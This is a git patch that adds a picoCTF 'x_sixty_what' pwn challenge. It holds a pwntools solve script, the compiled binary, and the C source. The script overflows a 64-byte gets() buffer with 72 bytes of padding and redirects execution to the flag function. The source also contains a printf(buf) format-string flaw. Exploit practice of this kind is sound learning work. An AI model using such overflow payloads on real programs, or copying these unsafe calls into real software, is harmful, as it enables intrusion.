From acada7af66f8d0f2df6b5a544027898b761f94fa Mon Sep 17 00:00:00 2001 From: h7x4 Date: Tue, 3 Sep 2024 21:30:47 +0200 Subject: [PATCH] pwn/x_sixty_what --- pwn/x_sixty_what/solve.py | 33 +++++++++++++++++++++++++++++++++ pwn/x_sixty_what/vuln | Bin 0 -> 17128 bytes pwn/x_sixty_what/vuln.c | 37 +++++++++++++++++++++++++++++++++++++ 3 files changed, 70 insertions(+) create mode 100755 pwn/x_sixty_what/solve.py create mode 100755 pwn/x_sixty_what/vuln create mode 100644 pwn/x_sixty_what/vuln.c diff --git a/pwn/x_sixty_what/solve.py b/pwn/x_sixty_what/solve.py new file mode 100755 index 0000000..999e418 --- /dev/null +++ b/pwn/x_sixty_what/solve.py @@ -0,0 +1,33 @@ +#!/usr/bin/env nix-shell +#!nix-shell -p python3 -i python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "saturn.picoctf.net 63864".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + + print(r.recvuntil(b"Welcome to 64-bit. Give me a string that gets you the flag:")) + offset = 72 # found with pwndbg + print(f"flag: {hex(exe.sym.flag)}") + print(p64(exe.sym.flag)) + payload = b'A' * offset + p64(exe.sym.flag + 5) # skip one instruction for some reason... + r.sendline(payload) + print(r.recvall()) + r.close() + +if __name__ == "__main__": + main() diff --git a/pwn/x_sixty_what/vuln b/pwn/x_sixty_what/vuln new file mode 100755 index 0000000000000000000000000000000000000000..4f16c682402bb9c5118d12336017934cba3223eb GIT binary patch literal 17128 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 literal 0 HcmV?d00001 diff --git a/pwn/x_sixty_what/vuln.c b/pwn/x_sixty_what/vuln.c new file mode 100644 index 0000000..fc76b33 --- /dev/null +++ b/pwn/x_sixty_what/vuln.c @@ -0,0 +1,37 @@ +#include +#include +#include +#include +#include + +#define BUFFSIZE 64 +#define FLAGSIZE 64 + +void flag() { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + printf(buf); +} + +void vuln(){ + char buf[BUFFSIZE]; + gets(buf); +} + +int main(int argc, char **argv){ + + setvbuf(stdout, NULL, _IONBF, 0); + gid_t gid = getegid(); + setresgid(gid, gid, gid); + puts("Welcome to 64-bit. Give me a string that gets you the flag: "); + vuln(); + return 0; +} +